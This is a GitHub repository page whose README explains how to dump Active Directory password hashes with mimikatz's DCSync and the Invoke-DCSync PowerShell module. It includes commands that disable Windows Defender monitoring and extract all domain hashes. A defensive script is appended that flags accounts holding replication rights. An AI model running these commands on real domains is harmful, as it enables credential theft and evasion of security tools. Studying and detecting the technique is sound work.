https://github.com/al1ex/invoke-dcsync
Invoke-DCSync
Invoke-DCSync
- Host: GitHub
- URL: https://github.com/al1ex/invoke-dcsync
- Owner: Al1ex
- Created: 2020-09-11T13:06:19.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2020-09-11T13:08:54.000Z (over 5 years ago)
- Last Synced: 2025-02-03T09:40:53.552Z (over 1 year ago)
- Topics: invoke-dcsync
- Language: PowerShell
- Size: 494 KB
- Stars: 1
- Watchers: 2
- Forks: 3
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Invoke-DCSync
Invoke-DCSync
Reference: https://adsecurity.org/?p=1729
Reference: https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/
Goal: retrieve password hashes from all user accounts on a domain controller using the mimikatz DCSync function
Warning: Only do this in a lab environment.
mimikatz implements a function called DCSync, which allows mimikatz to impersonate a domain controller and attempt to retrieve all password hashes from another domain controller.
You may need to disable Windows Defender. Open PowerShell as an administrator and type:
~~~
$ Set-MpPreference -DisableRealtimeMonitoring $true
~~~
Start mimikatz and run:
~~~
$ lsadump::dcsync /domain:test.local /user:Administrator
~~~
Now you have the password hash for that user.
This requires that you have Administrator access, specifically the Get-Replication-Changes-All Common Name attribute.
You can use the Invoke-DCSync module to extract all hashes.
Download from: https://gist.github.com/monoxgas/9d238accd969550136db
~~~
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat
~~~
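A defender-side check for the access requirement stated above, as an added example that is not part of the Invoke-DCSync repository: it lists which principals hold the replication right (named DS-Replication-Get-Changes-All in the directory schema) in a domain-root ACL and flags holders outside an allow-list. The function names, the allow-list and the sample ACEs (constructed, with `TEST` as a placeholder domain) are assumptions.

```powershell
# Added example. Function names, $SampleAces and the TEST\... principals are hypothetical.
# Schema GUIDs of the two replication extended rights (identical in every forest).
$ReplGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
$AllRights = '00000000-0000-0000-0000-000000000000'  # empty ObjectType: every extended right

# Return the replication rights that a single ACE grants (nothing for Deny or unrelated ACEs).
function Get-GrantedReplRight($a) {
    $rights = "$($a.ActiveDirectoryRights)"; $type = "$($a.ObjectType)".ToLower()
    if ("$($a.AccessControlType)" -ne 'Allow') { return }
    if ($rights -match 'GenericAll' -or ($rights -match 'ExtendedRight' -and $type -eq $AllRights)) {
        return @($ReplGuids.Values)
    }
    if ($rights -match 'ExtendedRight' -and $ReplGuids.ContainsKey($type)) { return $ReplGuids[$type] }
}

# List every principal whose ACEs grant Get-Changes-All and flag those outside the allow-list.
function Find-ReplicationRightHolder {
    param(
        [Parameter(Mandatory)] [object[]] $Ace,
        # Principals expected to replicate; an assumption, adjust for your domain.
        [string[]] $Allow = @('Domain Controllers', 'Enterprise Domain Controllers', 'Administrators')
    )
    $Ace | Group-Object { "$($_.IdentityReference)" } | ForEach-Object {
        $granted = @($_.Group | ForEach-Object { Get-GrantedReplRight $_ } | Sort-Object -Unique)
        if ($granted -contains 'DS-Replication-Get-Changes-All') {
            [pscustomobject]@{
                Identity   = $_.Name
                Rights     = $granted -join ', '
                HasBoth    = $granted.Count -eq 2   # DCSync also needs DS-Replication-Get-Changes
                Unexpected = $Allow -notcontains ($_.Name -split '\\')[-1]
            }
        }
    }
}

# Constructed sample ACEs, shaped like the entries of (Get-Acl 'AD:\<domain DN>').Access.
$SampleAces = @'
IdentityReference,AccessControlType,ActiveDirectoryRights,ObjectType
TEST\Domain Controllers,Allow,ExtendedRight,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
TEST\svc-backup,Allow,ExtendedRight,1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
TEST\svc-backup,Allow,ExtendedRight,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
TEST\helpdesk,Allow,GenericAll,00000000-0000-0000-0000-000000000000
TEST\contractor,Deny,ExtendedRight,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
'@ | ConvertFrom-Csv
Find-ReplicationRightHolder -Ace $SampleAces | Format-Table -AutoSize
```

Against a live domain, pass `(Get-Acl "AD:\$((Get-ADDomain).DistinguishedName)").Access` from the ActiveDirectory module as `-Ace`. The check reads direct ACEs only, so rights gained through group membership need a separate membership review.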